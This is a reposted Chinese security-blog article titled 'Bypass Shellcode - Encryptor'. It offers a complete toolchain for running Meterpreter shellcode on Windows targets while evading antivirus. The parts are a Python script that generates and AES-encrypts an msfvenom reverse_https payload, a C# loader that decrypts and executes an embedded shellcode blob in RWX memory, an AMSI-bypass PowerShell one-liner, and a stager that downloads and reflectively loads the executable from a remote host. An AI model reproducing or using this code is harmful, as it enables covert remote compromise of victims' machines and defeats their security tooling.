Bypass Shellcode - Encryptor
2022-1-3 11:32:56 Author: mp.weixin.qq.com(查看原文) 阅读量:119 收藏

文章来源 :Khan安全攻防实验室

        生成包含 base64 编码、AES 加密的 shellcode 的 .Net 二进制文件,该 shellcode 将在 Windows 目标上执行,绕过防病毒软件。

使用meterpreter_encryptor.py来创建加密的 base64 shellcode:

[email protected]:~# ./meterpreter_encryptor.py -p windows/x64/meterpreter/reverse_https -i 192.168.1.228 -l 443 -f b64[+] Generating MSFVENOM payload...[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload[-] No arch selected, selecting arch: x64 from the payloadFound 1 compatible encodersAttempting to encode payload with 1 iterations of x64/xor_dynamicx64/xor_dynamic succeeded with size 667 (iteration=0)x64/xor_dynamic chosen with final size 667Payload size: 667 bytesSaved as: ./msf.bin[+] Encrypting the payload, key=fjlmjiEgnQ4K6CjNCrPlqug1HW4icMec...[+] Base64 output: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

获取密钥和 shellcode 并将其插入 ProcessInjection.cs

// decrypt the base64 payloadstring payload = "sZkMii [etc...]";string key = "fjlmjiEgnQ4K6CjNCrPlqug1HW4icMec";

        将 C# 代码编译成可执行文件(例如,metInject.exe)并通过 Web 服务器提供它。

将可执行文件注入远程 PowerShell 进程:

# AMSI bypass$a = [Ref].Assembly.GetTypes();ForEach($b in $a) {if ($b.Name -like "*iutils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*itFailed") {$f = $e}};$f.SetValue($null,$true)
$bytes = (Invoke-WebRequest "http://192.168.1.228/metInject.exe").Content;$assembly = [System.Reflection.Assembly]::Load($bytes);$entryPointMethod = $assembly.GetType('ProcessInjection.Program', [Reflection.BindingFlags] 'Public, NonPublic').GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic');$entryPointMethod.Invoke($null, (, [string[]] ('', '')));

Help

./meterpreter_encryptor.py -h
usage: meterpreter_encryptor.py [-h] [-l LPORT] [-i LHOST] [-p PAYLOAD] [-m METHOD] [-k KEY] [-e ENCODER] [-f FORMAT]

optional arguments:
  -h, --help            show this help message and exit
  -l LPORT, --lport LPORT
                        The local port that msfconsole is listening on.
  -i LHOST, --lhost LHOST
                        The local host that msfconsole is listening on.
  -p PAYLOAD, --payload PAYLOAD
                        The payload to generate in msfvenom.
  -m METHOD, --method METHOD
                        The method to use: thread/delegate.
  -k KEY, --key KEY     The encryption key (32 chars).
  -e ENCODER, --encoder ENCODER
                        The meterpreter encoder.
  -f FORMAT, --format FORMAT
                        The format to output.

ProcessInjection.cs

using System;using System.Runtime.InteropServices;using System.Security.Cryptography;using System.Text;using System.IO;
namespace ProcessInjection
{
    // Loader half of the encryptor/loader pair shown on this page. It base64-decodes
    // and AES-CBC-decrypts an embedded blob, then calls into it as native code in the
    // current process.
    //
    // Analyst notes (everything below is visible in this file):
    //  * Key and ciphertext are both compiled into the binary, so the payload can be
    //    recovered statically: AES key = SHA-256(ASCII key string), IV = first 16 bytes
    //    of that same hash, AES-CBC, PKCS7 padding (see Decrypt).
    //  * Execution path: managed byte[] pinned with `fixed`, page range flipped to
    //    PAGE_EXECUTE_READWRITE with VirtualProtect, then invoked through a delegate —
    //    an RWX region is created over a GC heap buffer.
    class Program
    {
        // Win32 page-protection constants; only PAGE_EXECUTE_READWRITE is used in this file.
        public enum Protection
        {
            PAGE_NOACCESS = 0x01,
            PAGE_READONLY = 0x02,
            PAGE_READWRITE = 0x04,
            PAGE_WRITECOPY = 0x08,
            PAGE_EXECUTE = 0x10,
            PAGE_EXECUTE_READ = 0x20,
            PAGE_EXECUTE_READWRITE = 0x40,
            PAGE_EXECUTE_WRITECOPY = 0x80,
            PAGE_GUARD = 0x100,
            PAGE_NOCACHE = 0x200,
            PAGE_WRITECOMBINE = 0x400
        }

        // kernel32!VirtualProtect — changes the protection of a page range in this process.
        [DllImport("kernel32.dll")]
        static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

        // kernel32!VirtualAllocExNuma — called once in Shellcode(); the allocation it returns
        // is never read afterwards.
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);

        // Signature used to call the decrypted buffer as a function (no args, 32-bit return).
        private delegate Int32 ShellcodeDelegate();

        // Entry point. args is ignored; the PowerShell stager on this page passes two empty strings.
        static void Main(string[] args)
        {
            Shellcode();
        }

        // Decrypts the embedded payload and executes it in the current process.
        static void Shellcode()
        {
            // attempt heuristics/behaviour bypass
            // 0x1000 bytes, flAllocationType 0x3000, flProtect 0x4 (PAGE_READWRITE in the enum
            // above). The block is never referenced again; only the call itself matters here.
            IntPtr mem = VirtualAllocExNuma(System.Diagnostics.Process.GetCurrentProcess().Handle, IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
            if (mem == null)
            {
                return;
            }

            // decrypt the base64 payload - change these to your own encrypted payload and key
            // Both values are constants in the binary; see the class comment on offline recovery.
            string payload = "sZkMiiTitR5hQL2YXTBgjq91qq0FuEqgfR7YiKt2N1IZ8vqW3q/BrIYTjBb7nKLXCsJM25sRqh+R9WHGNsTV8webqwx7ZfAYSvlmEmzIJcKaBVdJO+Lbr7h9RomrOdyaPUAZ6P49lnsZFF1fdvnFOg/WvSdKUrx/eKEt5sNBn/Jz43y26mDEwEEqseydPQHyBcT9Av/ZkTQC6GZU8D+pQhKvXNdnlGrHJk4+G25me/Hzr0P1YuX9ZpGbyXb/pLdmdViAGAPtA/OORVt6xmij4AY24j8SLocUs2A6lSJZHYD2C1+DIc1Lyw8UJ6dtNIU2xDtsHCWX0OlkcjU+QoYpCavs78Y+OePjyBwkryWTzMyuKBgAREjbQQdsIn6dQZeqk/tKI/l6Fmhu27V+wFX7mxUP/KXWf9PI/3QYiuLmkJCWFBL9sINPbLVLePFSke8Ik3t+vp5SIcM+wMufg+TXBdUNpE//gTgCpblXdJfkkqVpMFBxnfX2vYPDcFLWteiNsnHCn9REbVB3MqJe5T55tO/CLq1KkZ2R7Z7rra6H8OhJgOLKEdJ/XHdZV9IFatAtRW2dxVo49P2YFmux2WSDiKhVRoCuLMVM6PeTuzsN+2qV4Zrq6tRAVLwmmTn5uflWER1aScePh6+6utXW/0jS+Hz7KiGP2//8+YDwzYbkLJnfn9B4AdmE4BuNTJRrv7tumsxboNkmWOx87lVElzn5ZM9OP721s8LiSyfkD1zm4o9j2u80syPeEU3PXvOU1epBTsTjdwRWlAYF+wzv3olAjPzR/xojjB602MIUNeCPn4fqDp6NjEokELcgawbWNl1vKYo4QEYgtlhVmqIkk2ooz527AEQb5EWQhkaZEWr4AAmGO1YfvYDCTcfUwV9p/jkg";
            string key = "fjlmjiEgnQ4K6CjNCrPlqug1HW4icMec";

            byte[] buf = Decrypt(key, payload);

            unsafe
            {
                fixed(byte* ptr = buf)
                {
                    // set the memory as executable and execute the function pointer (as a delegate)
                    // buf is a managed heap allocation; its page range becomes RWX here.
                    // The bool returned by VirtualProtect is not checked.
                    IntPtr memoryAddress = (IntPtr)ptr;
                    VirtualProtect(memoryAddress, (UIntPtr)buf.Length, (UInt32)Protection.PAGE_EXECUTE_READWRITE, out uint lpfOldProtect);

                    ShellcodeDelegate func = (ShellcodeDelegate)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(ShellcodeDelegate));
                    func();
                }
            }
        }

        // AES-CBC/PKCS7 decryption of a base64 string.
        // Key material: AES key = SHA-256(ASCII bytes of `key`) — 32 bytes, i.e. AES-256;
        // IV = the first 16 bytes of that same hash (SubArray(tempKey, 16)). This mirrors
        // hash_key()/encrypt() in the Python script on this page. Because the IV is derived
        // from the key and there is no integrity check, this is obfuscation of the embedded
        // blob rather than a confidentiality scheme.
        private static byte[] Decrypt(string key, string aes_base64)
        {
            byte[] tempKey = Encoding.ASCII.GetBytes(key);
            tempKey = SHA256.Create().ComputeHash(tempKey);

            byte[] data = Convert.FromBase64String(aes_base64);

            // decrypt data
            Aes aes = new AesManaged();
            aes.Mode = CipherMode.CBC;
            aes.Padding = PaddingMode.PKCS7;
            ICryptoTransform dec = aes.CreateDecryptor(tempKey, SubArray(tempKey, 16));

            using (MemoryStream msDecrypt = new MemoryStream())
            {
                using (CryptoStream csDecrypt = new CryptoStream(msDecrypt, dec, CryptoStreamMode.Write))
                {
                    csDecrypt.Write(data, 0, data.Length);

                    return msDecrypt.ToArray();
                }
            }
        }

        // Returns a copy of the first `length` bytes of a; used to take the IV from the key hash.
        static byte[] SubArray(byte[] a, int length)
        {
            byte[] b = new byte[length];
            for (int i = 0; i < length; i++)
            {
                b[i] = a[i];
            }
            return b;
        }
    }
}

shellcode_encryptor.py

#!/usr/bin/env python3import array, base64, random, stringfrom Crypto.Cipher import AESfrom hashlib import sha256import argparse, subprocess, os
def main() -> None:
    """Generate a raw msfvenom payload, AES-CBC encrypt it and print it as base64 or a C array.

    Side effects: writes ./msf.bin (raw msfvenom output), ./key.b64 (the key string,
    written as-is despite the extension) and ./payload.b64 (base64 ciphertext),
    and prints the key to stdout.
    """
    args = parse_args()
    lhost = args.lhost
    lport = args.lport
    key = args.key
    if not key:
        key = get_random_string(32)
    payload = args.payload
    method = args.method  # parsed but not used anywhere in this function
    format = args.format

    ''' generate msfvenom payload '''
    print("[+] Generating MSFVENOM payload...")
    # lport/lhost are passed through as strings; the '-b' bad-chars option is commented out.
    # `result` is not inspected, so a failed msfvenom run is only noticed when msf.bin is missing.
    result = subprocess.run(['msfvenom', '-p', payload, 'LPORT=' + lport, 'LHOST=' + lhost,
#                            '-b', '\\x00',
                             '-f', 'raw', '-o', './msf.bin'], capture_output=False)

    f = open("./msf.bin", "rb")
    buf = f.read()
    f.close()

    print("[+] key and payload will be written to key.b64 and payload.b64")

    ''' encrypt the payload '''
    print("[+] Encrypting the payload, key=" + key + "...")
    # AES key = SHA-256(key); IV = first 16 bytes of that hash — the C# loader on this
    # page derives both the same way, so the key string alone suffices to decrypt.
    hkey = hash_key(key)
    encrypted = encrypt(hkey, hkey[:16], buf)
    b64 = base64.b64encode(encrypted)

    f = open("./key.b64", "w")
    f.write(key)
    f.close()

    f = open("./payload.b64", "w")
    f.write(b64.decode('utf-8'))
    f.close()

    if format == "b64":
        ''' base64 output '''
        print("[+] Base64 output:")
        print(b64.decode('utf-8'))
        print("\n[+] Have a nice day!")
        return
    if format == "c":
        ''' c output '''
        print("[+] C output:")
        # builds "unsigned char payload[] ={0xaa,0xbb,...};" — hex[:-1] drops the trailing comma
        hex_string = 'unsigned char payload[] ={0x';
        hex = '0x'.join('{:02x},'.format(x) for x in encrypted)
        hex_string = hex_string + hex[:-1] + "};"
        print(hex_string)
        print("\n[+] Have a nice day!")
        return
def encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """AES-CBC encrypt `plaintext` after PKCS#7 padding to 16 bytes.

    `key` is truncated to 32, 24 or 16 bytes (AES-256/192/128). hash_key() always
    returns a 32-byte digest, so in this script the first branch is the one taken.
    `iv` is supplied by the caller (main passes the first 16 bytes of the key hash).
    """
    key_length = len(key)
    if (key_length >= 32):
        k = key[:32]
    elif (key_length >= 24):
        k = key[:24]
    else:
        k = key[:16]

    aes = AES.new(k, AES.MODE_CBC, iv)
    pad_text = pad(plaintext, 16)
    return aes.encrypt(pad_text)
def hash_key(key: str) -> bytes:
    """Return SHA-256 of the key's characters encoded as bytes.

    The per-character hex round-trip is equivalent to an ASCII encoding for ASCII
    keys, which is what the C# loader does with Encoding.ASCII.GetBytes before
    hashing; for non-ASCII characters the two sides would no longer agree.
    """
    h = ''
    for c in key:
        h += hex(ord(c)).replace("0x", "")
    h = bytes.fromhex(h)
    hashed = sha256(h).digest()
    return hashed
def pad(data: bytes, block_size: int) -> bytes:
    """PKCS#7 padding: append 1..block_size bytes, each equal to the pad length.

    A full block of padding is added when `data` is already block-aligned, which is
    what PaddingMode.PKCS7 on the C# side expects to strip.
    """
    padding_size = (block_size - len(data)) % block_size
    if padding_size == 0:
        padding_size = block_size
    padding = (bytes([padding_size]) * padding_size)
    return data + padding
def parse_args() -> argparse.Namespace:
    """Parse command-line options.

    NOTE(review): the default for --lport is "0.0.0.0" and for --lhost is "443",
    which reads as the two defaults being swapped relative to their help text —
    confirm against intended usage. The help transcript elsewhere on this page also
    lists a -e/--encoder option that this version does not define.
    """
    parser = argparse.ArgumentParser()

    parser.add_argument("-l", "--lport", default="0.0.0.0", type=str, help="The local port that msfconsole is listening on.")
    parser.add_argument("-i", "--lhost", default="443", type=str, help="The local host that msfconsole is listening on.")
    parser.add_argument("-p", "--payload", default = "windows/x64/meterpreter/reverse_https", type=str, help="The payload to generate in msfvenom.")
    # --method is accepted but not used by main()
    parser.add_argument("-m", "--method", default="thread", type=str, help="The method to use: thread/delegate.")
    # an empty key means main() generates a random 32-character one
    parser.add_argument("-k", "--key", default="", type=str, help="The encryption key (32 chars).")

    parser.add_argument("-f", "--format", default="b64", type=str, help="The format to output.")

    return parser.parse_args()
def get_random_string(length: int) -> str:
    """Return `length` random alphanumeric characters.

    Uses random.choice, i.e. a non-cryptographic RNG; the resulting key is printed
    and embedded next to the ciphertext anyway, so it provides obfuscation only.
    """
    letters = string.ascii_letters + string.digits
    result_str = ''.join(random.choice(letters) for i in range(length))
    return result_str
if __name__ == '__main__':
    # script entry point
    main()

侵权请私聊公众号删文



文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650530912&idx=3&sn=c81e3b1070f0cf1a795180b29dc1b776&chksm=83ba8184b4cd08927baeba6cb35a7efe45ed7153af92107751bcf934190ee34bcad34994b08e#rd